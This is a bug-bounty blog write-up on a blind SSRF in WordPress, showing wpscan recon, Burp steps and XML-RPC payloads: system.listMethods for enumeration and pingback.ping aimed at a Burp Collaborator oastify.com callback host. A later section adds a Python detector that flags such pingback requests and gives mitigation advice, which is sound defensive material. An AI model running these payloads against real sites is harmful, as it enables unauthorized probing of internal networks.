Unauthenticated Blind SSRF

Ashish Rai
4 min read · Jan 28, 2024


Hello Researchers,

My name is Ashish Rai. I am a bug hunter and security researcher, and I am back with a new vulnerability: Blind SSRF with the help of XML-RPC.

Let's start:

[Image: SSRF]

What is XML-RPC?

XML-RPC on WordPress is actually an API, or “application program interface”. It gives developers who make mobile apps, desktop apps and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things you can do when logged into WordPress via the web interface. These include:

Publish a post

Edit a post

Delete a post

Upload a new file (e.g. an image for a post)

Get a list of comments

Edit comments

While hunting on a particular website it is very difficult to find a bug; most of the vulnerabilities have already been found by other researchers. So today I will talk about an XML-RPC to SSRF vulnerability.

I will call the target target.com. While testing target.com I found lots of subdomains, and that is good for every hacker: lots of subdomains means lots of vulnerabilities. So I started basic recon, and after some time I noticed that one of the subdomains was running WordPress, MySQL and PHP. That is interesting, so I started with a basic wpscan, like (wpscan -u https://target.com). After that I ran this command (wpscan --url http://target.com --enumerate p), and I got this type of URL:

[Screenshot: xmlrpc server]

At this moment I felt like “moye moye”, because the reality was that I didn't know how to exploit xmlrpc. After some deep research I found this Medium PoC (https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32), where you can learn the exploitation from the PoC, but let's move on to reality. Now my main motive is to exploit xmlrpc.

Steps to Reproduce:

1> Go to Burp Suite, enable the intercept option and capture the request. It looks like this.

[Screenshot: request]

2> Now send that request to Repeater and change the request method from GET to POST. Now it looks like this.

[Screenshot: post]

3> You have to test whether xmlrpc is vulnerable or not. You can try this payload to test it.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

If it is vulnerable, it will show something like this.

[Screenshot: It is vulnerable]

4> Now let's try Blind SSRF.

5> Go to Burp Collaborator, copy the URL (1jlr6trc872q7sg0asm7bao02r8iwakz.oastify.com) and insert this payload.

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<YOUR SERVER>:<port></string></value></param>
<param><value><string>http://<SOME VALID BLOG FROM THE SITE></string></value></param>
</params>
</methodCall>

In the http://yourserver field, just replace the value with your Burp Collaborator URL and send it.

6> Now go to your Burp Collaborator tab and poll it. If a response arrives carrying the server's internal IP, then it is vulnerable to Blind SSRF.

[Screenshot: Internal IP]
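The steps above show the two request bodies that matter on the wire: system.listMethods only tells you that XML-RPC is enabled and which methods exist, while pingback.ping is the call that makes the WordPress server fetch the attacker-supplied sourceURI, which is where the SSRF lives. Pingbacks legitimately come from other sites, so a defender cannot simply block off-site source URLs; what can be flagged are the patterns a real blog linking to you would never produce. The following detector is an added example written for this write-up, not code from the author or from WordPress. It parses an XML-RPC methodCall body the way a WAF or reverse-proxy hook in front of xmlrpc.php could, and it assumes a constructed set of site hostnames (SITE_HOSTS), a constructed list of out-of-band callback domains (OAST_SUFFIXES, seeded with the oastify.com domain from the write-up), and constructed sample bodies modelled on the two payloads above.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Hostnames that belong to the protected WordPress site. Constructed for this
# example from the write-up's placeholder target; load from config in practice.
SITE_HOSTS = {"target.com", "www.target.com"}

# Out-of-band callback domains. oastify.com is the one shown in the write-up;
# the list is an assumption here and a real deployment keeps its own current.
OAST_SUFFIXES = (".oastify.com", ".burpcollaborator.net")

# Methods that reveal the endpoint's capabilities: reconnaissance, not SSRF.
RECON_METHODS = {"system.listMethods", "system.getCapabilities"}


def parse_method_call(body: str):
    """Return (methodName, [string params]) from an XML-RPC methodCall body.

    Only <string> values are extracted, which is all pingback.ping carries.
    On untrusted input the defusedxml package is the safer parser.
    """
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    name_el = root.find("methodName")
    name = (name_el.text or "").strip() if name_el is not None else ""
    params = [(s.text or "").strip()
              for s in root.findall("./params/param/value/string")]
    return name, params


def is_internal_ip(host: str) -> bool:
    """True when host is a literal IP in a loopback, private or link-local range.

    Hostnames are deliberately not resolved: a detector on the request path
    should not perform DNS lookups on attacker-supplied names.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local


def _port(parts):
    """Port of a split URL; -1 when the port field is present but not numeric."""
    try:
        return parts.port
    except ValueError:
        return -1


def classify(body: str):
    """Classify one XML-RPC request body; returns (method, [finding tags])."""
    try:
        method, params = parse_method_call(body)
    except (ET.ParseError, ValueError):
        return "", ["malformed-xml"]

    findings = []
    if method in RECON_METHODS:
        findings.append("recon")
    if method != "pingback.ping":
        return method, findings

    if len(params) < 2:
        return method, ["pingback-missing-params"]
    source, target = urlsplit(params[0]), urlsplit(params[1])
    if not source.hostname or not target.hostname:
        return method, ["pingback-unparseable-url"]

    # A pingback must be about a post on this site; anything else is noise or
    # an attempt to use the endpoint as a generic URL fetcher.
    if target.hostname not in SITE_HOSTS:
        findings.append("pingback-target-offsite")
    # The server will fetch sourceURI: flag what a real linking blog never sends.
    if is_internal_ip(source.hostname):
        findings.append("pingback-internal-source")
    if source.hostname.endswith(OAST_SUFFIXES):
        findings.append("pingback-oast-callback")
    port = _port(source)
    if port is not None and port not in (80, 443):
        findings.append("pingback-nonstandard-port")
    return method, findings


# Constructed request bodies modelled on the write-up's two payloads; the post
# path on target.com and the "legit" blog URL are made up for this example.
SAMPLE_BODIES = {
    "enumerate": "<methodCall><methodName>system.listMethods</methodName>"
                 "<params></params></methodCall>",
    "oast": "<methodCall><methodName>pingback.ping</methodName><params>"
            "<param><value><string>http://1jlr6trc872q7sg0asm7bao02r8iwakz.oastify.com</string></value></param>"
            "<param><value><string>https://target.com/2024/01/hello-world/</string></value></param>"
            "</params></methodCall>",
    "internal": "<methodCall><methodName>pingback.ping</methodName><params>"
                "<param><value><string>http://10.0.0.5:8080/</string></value></param>"
                "<param><value><string>https://target.com/2024/01/hello-world/</string></value></param>"
                "</params></methodCall>",
    "legit": "<methodCall><methodName>pingback.ping</methodName><params>"
             "<param><value><string>https://blog.example.org/i-linked-you/</string></value></param>"
             "<param><value><string>https://target.com/2024/01/hello-world/</string></value></param>"
             "</params></methodCall>",
}


def scan_all(bodies=SAMPLE_BODIES):
    """Classify every sample body; returns {name: (method, findings)}."""
    return {name: classify(body) for name, body in bodies.items()}


if __name__ == "__main__":
    for name, (method, findings) in scan_all().items():
        print(f"{name:10s} {method:22s} {findings}")
```

Running the block flags the Collaborator payload as an out-of-band callback, the 10.0.0.5:8080 variant as an internal-network probe on a non-standard port, and leaves the ordinary pingback from another blog unflagged. On the WordPress side the cleaner fix is to not expose the method at all: return false from the xmlrpc_enabled filter if XML-RPC is unused, or unset pingback.ping from the array passed to the xmlrpc_methods filter if other methods are still needed.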

Impact:

The vulnerability could be used to conduct further attacks, such as accessing internal systems or exfiltrating sensitive data.

If you like this write-up, please clap for it.

Waiting for the response …….

